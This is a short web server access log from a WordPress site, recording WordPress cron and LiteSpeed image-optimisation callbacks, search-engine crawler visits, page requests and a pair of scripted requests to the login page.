34.168.140.64 - - [29/Mar/2025:21:54:28 -0400] "GET /category/technology/ HTTP/1.1" 200 9426 "https://fileluna.com/category/technology" "Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
198.54.114.83 - - [29/Mar/2025:21:54:29 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=VimSsb79o3VMswyrI3T2vjTXaTPpq4Ap&litespeed_type=imgoptm HTTP/1.1" 200 5 "-" "WordPress/6.7.2; https://fileluna.com"
114.119.129.34 - - [29/Mar/2025:21:54:31 -0400] "GET /category/family-relationship/ HTTP/1.1" 200 9431 "https://fileluna.com/the-role-of-security-guards-in-dallas-texas/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
198.54.114.83 - - [29/Mar/2025:21:55:49 -0400] "POST /wp-cron.php?doing_wp_cron=1743299749.7079539299011230468750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://fileluna.com"
198.54.114.83 - - [29/Mar/2025:21:55:50 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=9u6iewfYmTRQVRoDcXoPusfqsQO6wfgE&litespeed_type=imgoptm HTTP/1.1" 200 5 "-" "WordPress/6.7.2; https://fileluna.com"
114.119.132.163 - - [29/Mar/2025:21:55:49 -0400] "GET /category/arts-entertainments/page/20/ HTTP/1.1" 200 11274 "https://fileluna.com/category/arts-entertainments/page/23/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
139.59.113.8 - - [29/Mar/2025:21:56:17 -0400] "GET /wp-login.php HTTP/1.1" 200 1761 "-" "GRequests/0.10"
198.54.114.83 - - [29/Mar/2025:21:56:18 -0400] "POST /wp-cron.php?doing_wp_cron=1743299778.3116369247436523437500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://fileluna.com"
139.59.113.8 - - [29/Mar/2025:21:56:18 -0400] "POST /wp-login.php HTTP/1.1" 200 1899 "-" "GRequests/0.10"
198.54.114.83 - - [29/Mar/2025:21:56:18 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=Ebv8GyecZHBjTrHPtgeUSLKzQYb7u2Pv&litespeed_type=imgoptm HTTP/1.1" 200 5 "-" "WordPress/6.7.2; https://fileluna.com"
198.54.114.83 - - [29/Mar/2025:21:57:11 -0400] "POST /wp-cron.php?doing_wp_cron=1743299831.6163530349731445312500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://fileluna.com"
114.119.129.34 - - [29/Mar/2025:21:57:11 -0400] "GET /category/arts-entertainments/page/19/ HTTP/1.1" 200 11275 "https://fileluna.com/category/arts-entertainments/page/16/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
198.54.114.83 - - [29/Mar/2025:21:57:12 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=GvBWTyKrslXM8ICslQlrpCi4GWBuirQu&litespeed_type=imgoptm HTTP/1.1" 200 5 "-" "WordPress/6.7.2; https://fileluna.com"
198.54.114.83 - - [29/Mar/2025:21:58:39 -0400] "POST /wp-cron.php?doing_wp_cron=1743299919.1382820606231689453125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://fileluna.com"
114.119.149.81 - - [29/Mar/2025:21:58:35 -0400] "GET /best-instant-hot-and-cold-water-tap-for-your-kitchen/ HTTP/1.1" 200 12269 "https://fileluna.com/exploring-the-role-of-a-singapore-hypnotherapist/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
198.54.114.83 - - [29/Mar/2025:21:58:40 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=s8LaZGFTcbsnAxznV3hpOMJ3cEH6bPOm&litespeed_type=imgoptm HTTP/1.1" 200 5 "-" "WordPress/6.7.2; https://fileluna.com"
198.54.114.83 - - [29/Mar/2025:21:59:14 -0400] "POST /wp-cron.php?doing_wp_cron=1743299953.8939719200134277343750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://fileluna.com"
104.196.239.51 - - [29/Mar/2025:21:59:13 -0400] "GET /2024/08 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
104.196.239.51 - - [29/Mar/2025:21:59:15 -0400] "GET /2024/08/ HTTP/1.1" 200 11036 "https://fileluna.com/2024/08" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
198.54.114.83 - - [29/Mar/2025:21:59:15 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=BAmL9KIew2S1K3O8Z5eCiLw4CPilKk2H&litespeed_type=imgoptm HTTP/1.1" 200 5 "-" "WordPress/6.7.2; https://fileluna.com"
114.119.137.80 - - [29/Mar/2025:21:59:59 -0400] "GET /a-revitalizing-experience-in-osan/ HTTP/1.1" 200 11773 "https://fileluna.com/author/admin/page/24/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
198.54.114.83 - - [29/Mar/2025:22:01:26 -0400] "POST /wp-cron.php?doing_wp_cron=1743300086.2027330398559570312500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://fileluna.com"
198.54.114.83 - - [29/Mar/2025:22:01:27 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=qSlcYxvXC1Q5qRr6v0bqXKzjbVXeZVQy&litespeed_type=imgoptm HTTP/1.1" 200 5 "-" "WordPress/6.7.2; https://fileluna.com"
114.119.148.27 - - [29/Mar/2025:22:01:23 -0400] "GET /2024/page/23/ HTTP/1.1" 200 11061 "https://fileluna.com/2024/page/24/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
34.105.12.64 - - [29/Mar/2025:22:01:45 -0400] "GET /2024/11 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
34.105.12.64 - - [29/Mar/2025:22:01:45 -0400] "GET /2024/11/ HTTP/1.1" 200 11374 "https://fileluna.com/2024/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
198.54.114.83 - - [29/Mar/2025:22:02:46 -0400] "POST /wp-cron.php?doing_wp_cron=1743300165.7808539867401123046875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://fileluna.com"
198.54.114.83 - - [29/Mar/2025:22:02:46 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=ECnJumoC8hGSUtc3yozsol9nI0An2V5H&litespeed_type=imgoptm HTTP/1.1" 200 5 "-" "WordPress/6.7.2; https://fileluna.com"
114.119.149.81 - - [29/Mar/2025:22:02:45 -0400] "GET /2024/11/page/3/ HTTP/1.1" 200 11168 "https://fileluna.com/2024/11/page/5/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
198.54.114.83 - - [29/Mar/2025:22:04:13 -0400] "POST /wp-cron.php?doing_wp_cron=1743300252.6751279830932617187500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://fileluna.com"
114.119.132.228 - - [29/Mar/2025:22:04:09 -0400] "GET /2024/10/page/6/ HTTP/1.1" 200 11153 "https://fileluna.com/2024/10/page/3/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
198.54.114.83 - - [29/Mar/2025:22:04:13 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=GeAubf8CBKsPLHvmxfpR9NECpOtKv80p&litespeed_type=imgoptm HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://fileluna.com"
